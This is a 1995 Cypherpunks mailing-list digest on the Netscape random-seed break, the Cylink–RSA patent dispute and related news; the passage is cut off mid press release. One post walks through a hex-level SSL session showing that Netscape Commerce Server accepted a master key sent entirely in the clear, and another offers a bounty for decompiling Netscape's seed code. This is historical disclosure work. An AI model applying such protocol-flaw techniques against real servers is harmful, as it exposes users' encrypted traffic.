<199509191947.MAA23655@ix3.ix.netcom.com> At 11:54 AM 9/19/95 -0500, andrew wrote, replying to Eric Fair: >> Just an idle thought: it might be possible to do a probabalistic >> verification of a RNG by sampling it over some number of samples, >But this wouldn't have solved Netscape's problem. Netscape was using a >pretty good PRNG (the one in RSAREF). The problem was they were/are using a >naive method of seeding it. The output of the PRNG would have been >statistically random, but since the seed had ridiculously little entropy it >was easy to guess. It's even worse - the seeding mechanism has too little entropy, given that you know some of the input data (e.g. system clock), but if it had, say, 32 bits of entropy, you'd have to run your test tens or hundreds of billions of times for the patterns to really show up - which is hard to do for something that uses the system clock or other hardware - and you'd really have to get at the output of the seeding process rather than the PRNG output, which has been filtered through enough MD5 that it's hard to detect the patterns. But you could still crack it easily enough. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From vince at offshore.com.ai Tue Sep 19 12:50:49 1995 From: vince at offshore.com.ai (Vincent Cate) Date: Tue, 19 Sep 95 12:50:49 PDT Subject: Caribbean Internet Services? (yes!) In-Reply-To: Message-ID: > Perry E. Metzger > Timothy C. May writes: > > Power in St. Thomas may not be back for a year in some parts. The roads, > > sewers, power lines, phone system, etc. will likely have to be completely > > rebuilt. > [...] > > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > > they were a few months ago. > > Not really. I suspect that phone company co-location and using buried > lines and your own generator would probably fix most problems if you > were "serious" about doing such a thing. We are not so bad off down here. Anguilla took a direct hit from Luis. Some of us have had to move computers into town for a week or two, but that is really it. Also, it has meant a couple weeks where we did not get as much done, but not months of setback. There is power and phone in town, cell phones work (give me a ring at (809) 497-7255), generators are not that expensive (like $600 for 5 kw). The utility polls have almost all been straightened or replaced already (2 weeks). The high-tension lines have already been strung to many places (like near my house). Anguilla should be rewired within another 6 weeks (we had the HMS South Hampton here for the last 2 weeks and now have 100 Royal Engineers helping out). Nobody was killed here. We all have our own cisterns so we have water, just bucket powered. The places that were hit hard were poor areas that some of the islands have, and people on boats. Also, some other islands will have water problems (not Anguilla). -- Vince Cate From Anguilla - A tax-haven in the Caribbean (or as they like to say, a "Zero tax jurisdiction") http://www.offshore.com.ai/anguilla http://www.aibs.com.ai/ From cwe at Csli.Stanford.EDU Tue Sep 19 12:51:00 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 19 Sep 95 12:51:00 PDT Subject: Random publicity was: articles In-Reply-To: <43mrf2$arr@calum.csclub.uwaterloo.ca> Message-ID: <199509191950.MAA06575@Csli.Stanford.EDU> | This morning, one of the University's publicity people | forwarded Marketplace (a radio show) | and CNN (sending a camera crew) to me. Ouch - had a good night's sleep, did you? :-) | I've also received email from various people, including someone who | works in security at the Pentagon. | | I wonder if I should tell them I'm not an American? | | - Ian "but I'm Canadian, so that's the same thing, right?" :-( Too bad, you should have been a Swede, like me. Wouldn't it be fun to say something like; "Well, I'm not allowed to reveal this weakness to any American, since I'm not allowed to export munitions!" /Christian From WOOD at VAX2.ROCKHURST.EDU Tue Sep 19 13:06:26 1995 From: WOOD at VAX2.ROCKHURST.EDU (WOOD at VAX2.ROCKHURST.EDU) Date: Tue, 19 Sep 95 13:06:26 PDT Subject: netscape broken on NPR Message-ID: <01HVGQF85HCY00038M@VAX2.ROCKHURST.EDU> NPR reported on the security flaw in Netscape, 3:05 pm CDT. ------------------------------------------- | "Computers are boring and slow." | | | | David Wood | | Information Systems Specialist? | | wood at vax2.rockhurst.edu | ------------------------------------------- From tedwards at Glue.umd.edu Tue Sep 19 13:09:56 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 13:09:56 PDT Subject: NYT on Netscape Crack In-Reply-To: <9509191438.AA16172@toad.com> Message-ID: On Tue, 19 Sep 1995, Eli Brandt wrote: > It sounds as if Netscape thinks that public knowledge of the key > generation is part of the problem. I hope somebody on the security > team convinces management that entropy is more important than publicity. No matter what they say in the press, I doubt it will take more than a few weeks to reverse engineer the new RNG seeder and figure out where the data comes from. I am hoping it was more of a PR thing than a technical thing. I hope that Netscape tells us their RNG seed so Cyperhpunks don't have to go to all the trouble. If they tell us, we can let them know if it is a reasonable mechanism or bogus. -Thomas From tedwards at Glue.umd.edu Tue Sep 19 13:24:15 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 13:24:15 PDT Subject: Investing on Information We Get Here In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Timothy C. May wrote: > P.S. On Netscape, I've finally decided to do some buying. Sure, this latest > flaw is another embarrassment. But more deals and link-ups than ever are > being inked, and they've got the resources to really spruce up Navigator > and related products. I just don't see too many competitors on the horizon. Let's not forget that Netscape is the biggest and best boon to the internet I've ever seen. It is selling more bandwith, servers, and dial-up IP than anything that has come down the road. It is enabling people to put even more info on the net, and I love it! Of course, that is why it was targetted for the 40-bit RC4 crack, its immense popularity. The total bogosity of 40-bit keys is now pretty apparent, and it is helping moves to 64-bit export, and perhaps beyond. -Thomas From dccotey at eclat.uccs.edu Tue Sep 19 13:50:03 1995 From: dccotey at eclat.uccs.edu (Daniel C. Cotey) Date: Tue, 19 Sep 95 13:50:03 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > > If it wasn't for ITAR the Net would already have secure encryption and > authentication, and most such hacker attacks would be impossible (or at > least impractical). > As someone who has hacked a little I would say that sloppy coding (much like netscape's) has helped hackers far more than lack of encryption. Imagine for a moment if sun had included some form of encryption (maybe in nfs ?) in sunos 4.x.x, would it have been effective if it had as many holes as sendmail, etc.. ? Good algorithms well coded will hurt hackers. Good algorithms slopply coded will simply provide hackers with one more toy to abuse, while giving average people a false since of security (but you SAID it was strong crypto, so why did they get my credit card number ?) pUFF From jya at pipeline.com Tue Sep 19 14:10:50 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 14:10:50 PDT Subject: SUP_con Message-ID: <199509192103.RAA01374@pipe5.nyc.pipeline.com> 9-19-95. WashRag: "U.S. Agencies at Odds On Computer Exports." The State, Commerce and Defense departments are pushing for a loosening of federal controls on the export of U.S. supercomputers to all but a few developing nations, a move that would put extraordinary computing power into the hands of governments that have long been denied it. The proposal also has collected strong support from the computer industry but has provoked criticism from the Energy Department and the Arms Control and Disarmament Agency. Advocates of the plan want President Clinton to announce the new, weaker export limits during a proposed visit to a computer factory in California's Silicon Valley on Thursday. [No crypto mentioned.] "French Nuclear Program Closely Tied to U.S. Sharing of Sensitive Codes, Access to California Labs to Expand." Despite its claims of developing an independent nuclear deterrent, France has long relied on the U.S. for some of the most sophisticated technologies needed to upgrade and maintain a modern nuclear arsenal. Although known to specialists, the U.S.-French nuclear links have been little discussed over the years. Officials are currently are trying to negotiate an arrangement under which the two sides will begin to share sensitive computer codes that describe how bombs behave when they are detonated. France needs the data to make full use of access to two sophisticated new U.S. nuclear weapons research facilities that Washington has quietly offered French weapons experts. Deux: SUP_con (15 kb) From anonymous at freezone.remailer Tue Sep 19 14:12:16 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Tue, 19 Sep 95 14:12:16 PDT Subject: Cylink Message-ID: <199509192112.RAA10595@light.lightlink.com> WSJ, Sept 19, 1995. Cylink Claims Right To Key Technology Involving Encryption Sunnyvale, Calif. - A Silicon Valley company asserted a legal claim to a key technology for protecting electronic commerce, following an arbitration ruling. Closely held Cylink Corp. said the ruling gave back to the company control over two key Stanford University patents regarding public-key encryption, a technique for scrambling data from theft or eavesdropping. A panel of three arbitrators, asked to settle a dispute between Cylink and RSA Data Security Inc., dissolved a five-year partnership between the two that pooled their encryption patents. RSA, a closely held company based in Redwood City, Calif., is the dominant supplier of encryption software, with users that include Microsoft Corp., Novell Inc., Netscape Communications Corp., Apple Computer Inc. and International Business Machines Corp. The arbitrators ruled that RSA hasn't had the right to sublicense the Stanford patents since 1990. Cylink said it would seek royalties from companies that have licensed software code from RSA and are redistributing it, arguing that they are infringing the Stanford patents. ----- From rah at shipwright.com Tue Sep 19 14:16:58 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 19 Sep 95 14:16:58 PDT Subject: Financial Services Technology Consortium Message-ID: A friend found this... Cheers, Bob Hettinga --- begin forwarded text Bob: I was looking for a web site for Shawmut/Fleet Bank and could not find one. But I did come across this which I thought might be of particular interest to you... http://www.llnl.gov/fstc/index.html It is the Financial Services Technology Consortium (FSTC), which is a consortium of financial services providers, national laboratories, universities, and government agencies who sponsor and participate in non-competitive collaborative research and development on interbank technical projects. Cheers, Will --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ravage at einstein.ssz.com Tue Sep 19 14:30:13 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 19 Sep 95 14:30:13 PDT Subject: ASCII unabomber paper attribution and FTP address (fwd) Message-ID: <199509192140.QAA02210@einstein.ssz.com> Forwarded message: > From: lmccarth at cs.umass.edu (L. McCarthy) > Subject: Re: ASCII unabomber paper attribution and FTP address > Date: Tue, 19 Sep 1995 15:10:48 -0400 (EDT) > > Actually it's: > > ftp://ftp.ai.mit.edu/pub/users/misc/unabomber > > It isn't as of 4:28 Central...:( Anyone got a clue as to where it has flow to? Jim From jya at pipeline.com Tue Sep 19 14:32:13 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 14:32:13 PDT Subject: Una FTPaper 2 Message-ID: <199509192132.RAA04891@pipe5.nyc.pipeline.com> ftp.hacktic.nl/pub/incoming/unabomb.txt From droelke at rdxsunhost.aud.alcatel.com Tue Sep 19 14:40:09 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Tue, 19 Sep 95 14:40:09 PDT Subject: Netscape responds. Message-ID: <9509192139.AA21854@spirit.aud.alcatel.com> Netscape now has an article on their home page about the latest break in their security. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From sharborth at hai-net.com Tue Sep 19 14:56:15 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Tue, 19 Sep 95 14:56:15 PDT Subject: Netscape's random numbers Message-ID: <9508198115.AA811559884@houston_cc_smtp.hai-net.com> Congrats, nice job! The Netscape license explicitly prohibits decompiling (except where such prohibition is illegal). When this hits the media it will be important to avoid being tarred with the "hacker breaks rules and breaks in" brush. More subtly, it's probably a bad idea to call into question the overall business model of client binaries on the net. So. At least they're honest and let everbody know. Instead, emphasize importance of open code, public reviews, ability to link in your own code that meets public specs, etc. All of these things the Internet was designed to do, and U.S. ITAR regulations are designed to prohibit (globally, anyway). And also that the bad guys will never play by the rules. And re-emphasize that solutions are possible, just that the U.S. government prevents them from being deployed in a global economy. Here, here! Perhaps draw parallels to the recent Microsoft Word virus. /r$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-= W.S. "Skip" Harborth Manager & Senior Engineer Information Systems Security Engineering Houston Associates, Incorporated 4601 North Fairfax Dr, Suite 1001 Arlington, Virginia 22203 USA (703) 284-8732 812-5099 (fax) sharborth at hai-net.com The opinions expressed are my own and have no relation to my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-= From thad at hammerhead.com Tue Sep 19 15:00:48 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Tue, 19 Sep 95 15:00:48 PDT Subject: Cylink Message-ID: <199509192138.OAA07353@hammerhead.com> > WSJ, Sept 19, 1995. > > Cylink Claims Right To Key Technology Involving > Encryption > > ... > > Sunnyvale, Calif. - A Silicon Valley company asserted a > legal claim to a key technology for protecting electronic > commerce, following an arbitration ruling. > > ... The arbitrators > ruled that RSA hasn't had the right to sublicense the > Stanford patents since 1990. > > Cylink said it would seek royalties from companies that > have licensed software code from RSA and are > redistributing it, arguing that they are infringing the > Stanford patents. > This was reported in the San Jose Mercury News today, as well. They reported that Cylink licenses the patents for $50,000. I'm assuming that the main patent in question is the Diffie-Hellmann patent (only 1 year and 7 months to DH Freedom Day!). Since PKP (and Bidzos, now president of RSA) always said that DH covered all public key encryption, it would seem that any RSA licensee would also need a license from Cylink. The Merc article said that RSA's and Cylink's interpretation of the arbitrators' ruling were completely opposite. I haven't seen a copy of the ruling. The Merc says that "Outside observers tend to take RSA's view of things." I'm stunned that an arbitrator could make a uniterpretable ruling on something so cut and dried, but then, IANAL. I've called both PKP and RSA, I haven't been able to talk to anybody about it yet. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 15:10:11 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 15:10:11 PDT Subject: Cylink Message-ID: <9509192145.AA01100@ch1d157nwk> anonymous claims the WSJ said: > The arbitrators ruled that RSA hasn't had the right to sublicense > the Stanford patents since 1990. > > Cylink said it would seek royalties from companies that have licensed > software code from RSA and are redistributing it, arguing that they > are infringing the Stanford patents. hahahaha, this is funny if it's true... Anyone know which two patents they are referring to? (diffie-hellman and merkle-hellman?) Any ideas on how this will change the legal status of RSAREF and PGP? andrew From bobw at netmanage.com Tue Sep 19 15:45:11 1995 From: bobw at netmanage.com (Bob Williams) Date: Tue, 19 Sep 95 15:45:11 PDT Subject: NetManage - Cylink Press Announcement Message-ID: There are quite a few open issues regarding the reliability, interoperability, and licensing of public key technology. All parties interested in access to code for testing and comment please respond to this email address. Thanks Bob ------------ NETMANAGE, Inc. Press Release FOR IMMEDIATE RELEASE Contact: Donna Loughlin, NetManage, (408) 973-7171 Donna at netmanage.com NetManage Licenses Public Key Cryptography from CYLINK The Two Firms to Promote an Open Interface for Internet Security which Corrects Flaws and Eliminates Financial and Interoperability Barriers for Cryptography. Cupertino, California - September 19, 1995- NetManage, the leader in TCP/IP Applications for Windows and Internet productivity software, announced today that is has signed a licensing agreement with CYLINK Corporation for technology which incorporates the fundamental patents covering public key cryptography. NetManage will be providing support for public key authentication and data encryption as a fundamental component of its Chameleon Enterprise strategy. The two firms further announced that they plan to provide support for an open interface for Internet security which will address recent flaws found in cryptographic implementations used by Netscape Communications and other unpublicized security holes in existing Internet security protocols. The standard is further intended to eliminate the financial and interoperability barriers that have been holding back widespread use of public key cryptography on the Internet. In a separate announcement released yesterday, CYLINK announced that it had prevailed in a patent lawsuit with RSA Data Security which found that RSA had infringed U.S. patents held by CYLINK which cover all known implementations of public key technology. About Internet Security ----------------------- Establishing a secure Internet connection requires any computer software program to perform two functions: Authentication of the user, and bulk encryption of data. The Authentication phase allows two computers to verify that each party is who they claim to be, and that they are authorized to enter into a secure communications session. This is done via 'public key' technology, which was developed and patented originally by Stanford University and licensed exclusively by CYLINK Corporation. During the authentication phase the two computers also agree upon the encryption method to be used for bulk data transfer during the time the two computers are communicating data between one another. These ciphers can be implemented in either software or hardware, including PCMCIA cards. Popular encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and RC-4 and are available from a variety of software and hardware vendors. Limitations of Current Internet Security Standards -------------------------------------------------- Current implementations of security protocols proposed as standards by Netscape Communications and RSA Data Security, Inc. include security flaws and fail to fully accommodate open and interoperable secure communications between computers which use different bulk encryption ciphers. These problems have limited the adoption of Internet security as a widespread interoperable feature of all Internet software and hardware products including end-user applications, servers, firewalls, and secure routers. NetManage and CYLINK, along with other major software and hardware developers, will be announcing next week the release of a publicly available security implementation which allows for �plug & play� interoperability for users of Internet security, and the endorsement of protocol extensions which improve the reliability of current proposed Internet security standards. This open implementation will not lock software or hardware developers into the use of encryption technology from any one vendor. Related APIs, key exchange technology, and encryption will be made publicly available to other software and hardware developers. Licensing will include source code and no per-copy royalty fees. About NetManage --------------- NetManage Inc., the fastest growing software company in the United States, develops markets and supports an integrated set of Internet-based applications, servers and development tools for Microsoft Windows, Windows 95 and Windows NT. NetManage software allows corporations to facilitate communication, sharing of information and collaboration between workgroups using Internet technology. The company's award winning products include Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose shares are traded on the NASDAQ under the ticker symbol NETM. Its products are sold world-wide by NetManage's direct sales force and authorized channel partners. About CYLINK ------------ CYLINK Corporation is the world�s largest provider of enterprise-wide network information security products and wireless communications. CYLINK is the exclusive holder of the fundamental patents which broadly claim the invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and Helman-Pohling) and which were originally developed at Stanford University. Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, financial institutions and government agencies. Licensees of CYLINK technology include CISCO Systems, and other prominent hardware and software developers. # # # From AndrewR at beetle.vironix.co.za Tue Sep 19 15:45:31 1995 From: AndrewR at beetle.vironix.co.za (Andrew Roos) Date: Tue, 19 Sep 95 15:45:31 PDT Subject: A Netscape Server implementation error Message-ID: <305F486F@beetle.vironix.co.za> Hi Sameer Thanks in advance for the T-shirt, and I like the Web site. On the subject of Netscape implementation errors, I note that the SSL protocol specification states in section 5.6.1 (CLIENT-MASTER-KEY) that "It is also an error if CLEAR-KEY-LENGTH is non-zero and the the CIPHER-KIND is not an export cipher". However, I note that Netscape Commerce Server 1.1 will happily accept a "secure" connection using the non-export cipher SSL_CK_RC4_128_WITH_MD5, even if the CLEAR-KEY-LENGTH is set to 16 and the *entire* master key is sent unencrypted. Here is an extract from an SSL session with www.netscape.com which illustrates the oversight: ------------------------------- Start of Session --------------------------- (1) The session was initialised as normal, and the following values were exchanged in the SERVER-HELLO and CLIENT-HELLO: Challenge: a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c Connection id: ef 47 3b 44 db d9 8d 1a f0 da 3e 14 73 97 a3 1f (2) I then sent the following CLIENT-MASTER-KEY message, which is reproduced in full: SSL Record Header: 80 9a Message type: SSL_MT_CLIENT_MASTER_KEY 02 Cipher kind: SSL_CK_RC4_128_WITH_MD5 01 00 80 Clear key length: 16 00 10 Encypted key length: 128 bytes 00 80 Key arg length: 0 00 00 Clear key data: the *entire* master key sent in the clear af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3 Encrypted key: this is a zero-length block formatted using PKCS#1 block type 2 and encrypted under Netscape's public key. Since it contains no data, an eavesdropper would not need to decrypt it in order to decrypt the rest of the session. af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3 9b 9b 0b ff cd e8 2f 2c 0d 16 4e 90 73 26 4e e7 e0 3f 45 8a ce 9a 21 d6 2a 6b b8 9a 20 4e bc cf d0 01 36 86 1c db e0 8b a8 e3 4c 9b 15 11 ea 95 b1 50 3f c9 42 9a 97 77 0f 9d 29 97 7e 87 1b 8f 77 b6 c9 c6 53 90 5b 74 4c 92 99 62 ad 8b bf 4c 28 ac 1b 11 32 64 56 c9 f0 d5 6f c9 89 6b 55 3f b9 42 aa 7b 7c f0 a1 89 93 22 13 46 e2 58 63 23 b2 51 83 92 76 46 05 65 87 86 5b 52 5a d1 02 ee (3) I calculated the session keys in the normal manner, using the master key which was sent entirely in the clear. The result was: Client read key: 14 3e 84 a6 54 57 d6 51 94 cf 54 f5 5a 29 4a ef Client write key: 9d e1 16 77 92 ee 89 f2 2d 30 c2 a2 e1 77 9f 5d (4) Instead of disconnecting, the Netscape server sent the following reply (the header has been removed): 28 40 00 75 b8 d6 60 68 f5 cf ba 65 78 49 35 83 d3 3a b5 d3 81 23 2d f8 7d c6 f8 47 4d 0c 62 c3 b4 This was decrypted using the client read key to give the following SERVER_VERIFY message: Message Authentication Code: 7b 95 2a 84 a1 55 fc 59 32 6b 53 ec e0 1d 80 4a Message type: SSL_MT_SERVER_VERIFY 05 Challenge data (which agrees with the challenge sent in the CLIENT-HELLO): a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c (5) The negotiation phase of the protocol was concluded with encrypted CLIENT-FINISHED and SERVER_FINISHED messages as per normal. (6) I sent the encrypted HTTP command "GET / HTTP/1.0" and received the following text (after decryption, stripping MAC and header, etc: HTTP/1.0 200 OK Server: Netscape-Commerce/1.1 Date: Tuesday, 19-Sep-95 21:15:23 GMT Last-modified: Tuesday, 19-Sep-95 21:14:09 GMT Content-length: 5278 Content-type: text/html Followed by the Netscape home page, which included the following statement: Find out how Netscape is responding immediately to upgrade customers and minimize risk of future threats. (7) Having obtained the warm, fuzzy feeling I so desired, I closed the connection secure in the knowledge that my secrets were safe with Netscape. -------------------------------- End of Session ----------------------------- This shows that Commerce Server 1.1 is prepared to accept a "secure" connection which is completely insecure as the entire master key has been sent in the clear and an eavesdropper could decrypt the session without any cryptanalysis. This does not mean that sessions between "well-behaved" browsers and Netscape servers are insecure, since the browser will send all 16 bytes of the key encrypted. Neither could it be used for an active attack, since if a new master was substituted for the one sent by the client, this would be detected during authentication of the SERVER-VERIFY message. However, it would provide an opportunity for a malicious browser supplier to "doctor" secure browsers so that they sent all (or part) of the master key in the clear, even when using non-export ciphers. (Of course there are better ways to do this; the "random padding" of PKCS block type 2 comes to mind). Although this is not nearly as important a result as Ian and Davids, it is the first server hack, so can I have another T shirt? :-) Andrew ________________________________________________________________ Andrew Roos // C++ programmers have class (but not much inheritance) PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26 Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos From sameer at c2.org Tue Sep 19 16:09:49 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 16:09:49 PDT Subject: netscape's response Message-ID: <199509192304.QAA05546@infinity.c2.org> " With this knowledge, an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time." Excuse me? A few hours? Try 25 seconds?? "Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers." A group which offered to review the first version, but Netscape refused. From their release it looks like they aren't finding a better source of entropy, but just using *more* sources of entropy. Doesn't mean that the entropy is good. A T-shirt to the first person to decompile the new Seed code and post the sources of "entropy" used. (See http://www.c2.org/hacknetscape for general [not written in stone] guidelines regarding t-shirt awards) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From yusuf921 at uidaho.edu Tue Sep 19 16:36:28 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Tue, 19 Sep 95 16:36:28 PDT Subject: Unabomber ? In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com> Message-ID: On Tue, 19 Sep 1995, John Young wrote: > I'm scanning it now and will offer it in a while -- it's a > long, long pole. > > > I'll ask by this post if someone wants to offer it FTP, I can > only do multiple e-mail bites from this hole. I'm willing to put it on my home page -- Syed Yusuf | http://www.uidaho.edu/~yusuf921 Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, and Greatness that does not bow before Children --Kalil Gibran From liberty at gate.net Tue Sep 19 16:46:58 1995 From: liberty at gate.net (Jim Ray) Date: Tue, 19 Sep 95 16:46:58 PDT Subject: NSA and Netscape Crack Message-ID: <199509192342.TAA25539@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Tim wrote: >> If the "flaws" are being found by our group, as John notes, just what is >> the NSA doing in the _second_ role it is supposed to have, it's "COMSEC," >> or communications security, role? and then Thomas wrote: >Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow >mechanisms ;) > >"I'm from the NSA, I'm here to help your crypto..." In the relatively short time I've been on this list, Cypherpunks have bruted, and then found a weakness in, two kinds of Netscape software. [A fine public service, IMO. Congrats to all involved.] I don't expect to know NSA's specific brute-force capability, but does anyone know if the NSA has *ever* found a glaring weakness in software and then told its author(s) or owner(s) about it? Do "we" perform the "COMSEC" role Tim was speaking of better than the NSA? JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMF9VHW1lp8bpvW01AQFZkwQAiQWJMfdP+5v0CozYH59ZGWUhpaKxgX15 vdVCdSzHgaN6sj5aLVL4yRI0bkVe/6nJ8I4Nj9cYS5K5AgbcmiRDLvEulc0Y+mwr B9rQBUcX7hM6lA+tEk2UpiGmR1xdh2U0Qpu93zT8T7MZtIc5dRReKeT21OXl4W96 NX4iONaceGY= =2nmI -----END PGP SIGNATURE----- Regards, Jim Ray "Censorship reflects society's lack of confidence in itself. It is a hallmark of an authoritative regime." -- Justice Potter Stewart ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From sameer at c2.org Tue Sep 19 17:07:59 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 17:07:59 PDT Subject: http://www.c2.org/hacknetscape/critique.phtml Message-ID: <199509200002.RAA10459@infinity.c2.org> My response to netscape's press release. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From szabo at netcom.com Tue Sep 19 17:11:55 1995 From: szabo at netcom.com (Nick Szabo) Date: Tue, 19 Sep 95 17:11:55 PDT Subject: Crypto + Economics + AI = Digital Money Economies In-Reply-To: Message-ID: <199509192326.QAA12334@netcom.netcom.com> I wholeheartedly agree with Tim that economics should play an important role in analyzing cryptographic protocols. It lets us step back and ask what features are important, and in general what we are trying to accomplish: usually something very different than the military uses of cryptography that have given rise to the current methodologies. To economics, especially game theory, I add a vast body of knowledge about human relationships, especially those involving commerce, that civilization has accumulated over the years: law, especially business law. If we step back and look at what many cypherpunks are trying to achieve, a major idealistic theme is a Ghandian cyberspace where violence can only be make-believe, whether in Mortal Komat or "flame wars". Cypherpunks want our telephone networks, Internet businesses, etc. to be both protected from force, and not dependent on force for their existence. Our 20th century information commerce systems, from publishing to credit cards, have often been very dependent on the threat of violence, usually law enforcement, to protect intellectual property rights, deter fraud, collect debts, etc. There is no utopia in sight where such threats can be completely eliminated, but we can recognize that they exist and carefully work to reduce our dependence on them. In a far more practical vein, the dawn of international commercial networks that criss-cross hundreds of jurisdictions with complex, obscure, and often contradictory regulations, gives rise to a vast market opportunity for substituting, where possible, network security mechanisms for law enforcement dependencies. The recent discoveries in cryptographic protocols provide us with a rich toolbox for solving these problems. Perhaps the most fundamental building block of business law is the contract. Strongly related to Tim's ontology of money is an area I have developed quite extensively called _smart contracts_. The terms of contractual relationships can often be formalized and standardized, and then performed via network-based protocols. These protocols, along with economic incentives, protect the performance of the contract from both fraud by the principals and attack from third parties. This is also the basic task of law enforcement in commercial law; thus smart contracts when successful reduce dependence on law enforcement as well as losses to fraud and cracking. Of special interest to cryptologists is that the principles of contract provide us with a methodology for the use of cryptography that is very different from, and potentially far more lucrative than, the traditional military paradigm. I have much more to say about these things in my essays under http://www.digicash.com/~nick/, and in a forthcoming article for _Extropy_. Nick Szabo szabo at netcom.com From aleph1 at dfw.net Tue Sep 19 17:33:44 1995 From: aleph1 at dfw.net (Aleph One) Date: Tue, 19 Sep 95 17:33:44 PDT Subject: New Kid On The Block Message-ID: Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ---------- Forwarded message ---------- Date: Tue, 19 Sep 95 14:25:20 PDT From: Bob Williams To: "Larry J. Hughes Jr." , Adam Shostack Cc: ssl-talk at netscape.com Subject: Re: details on security bug? The problems with SSL extend beyond the random number generation hole widely publicized in the press today. SSL 2.0 poses both financial and interoperability barriers to widespread use of Cryptography that will be addressed in the very near future. ------------------------------- NETMANAGE, Inc. Press Release FOR IMMEDIATE RELEASE Contact: Donna Loughlin, NetManage, (408) 973-7171 Donna at netmanage.com NetManage Licenses Public Key Cryptography from CYLINK The Two Firms to Promote an Open Interface for Internet Security which Corrects Flaws and Eliminates Financial and Interoperability Barriers for Cryptography. Cupertino, California - September 19, 1995- NetManage, the leader in TCP/IP Applications for Windows and Internet productivity software, announced today that is has signed a licensing agreement with CYLINK Corporation for technology which incorporates the fundamental patents covering public key cryptography. NetManage will be providing support for public key authentication and data encryption as a fundamental component of its Chameleon Enterprise strategy. The two firms further announced that they plan to provide support for an open interface for Internet security which will address recent flaws found in cryptographic implementations used by Netscape Communications and other unpublicized security holes in existing Internet security protocols. The standard is further intended to eliminate the financial and interoperability barriers that have been holding back widespread use of public key cryptography on the Internet. In a separate announcement released yesterday, CYLINK announced that it had prevailed in a patent lawsuit with RSA Data Security which found that RSA had infringed U.S. patents held by CYLINK which cover all known implementations of public key technology. About Internet Security ----------------------- Establishing a secure Internet connection requires any computer software program to perform two functions: Authentication of the user, and bulk encryption of data. The Authentication phase allows two computers to verify that each party is who they claim to be, and that they are authorized to enter into a secure communications session. This is done via �public key� technology, which was developed and patented originally by Stanford University and licensed exclusively by CYLINK Corporation. During the authentication phase the two computers also agree upon the encryption method to be used for bulk data transfer during the time the two computers are communicating data between one another. These ciphers can be implemented in either software or hardware, including PCMCIA cards. Popular encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and RC-4 and are available from a variety of software and hardware vendors. Limitations of Current Internet Security Standards -------------------------------------------------- Current implementations of security protocols proposed as standards by Netscape Communications and RSA Data Security, Inc. include security flaws and fail to fully accommodate open and interoperable secure communications between computers which use different bulk encryption ciphers. These problems have limited the 